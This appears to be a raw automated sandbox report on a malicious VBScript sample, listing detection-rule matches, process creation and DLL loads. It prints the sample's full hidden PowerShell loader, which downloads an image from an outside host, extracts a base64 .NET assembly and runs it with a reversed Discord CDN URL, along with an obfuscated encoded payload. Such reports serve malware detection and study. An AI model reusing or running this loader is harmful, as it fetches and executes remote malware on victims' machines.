BsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: windows.vbsInitial sample: Strings found which are bigger than 50
          Source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@6/10@3/3
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\umxfl[1].txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykwpcdqs.ccj.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: windows.vbsReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0f00cd2a30199c7965343663efb88ef5a4901642e7ee5f97d5840e8aad1eeafa=mh&0fac3366=si&07c15366=xe?txt.swodniw/6314679686261465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: adsnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
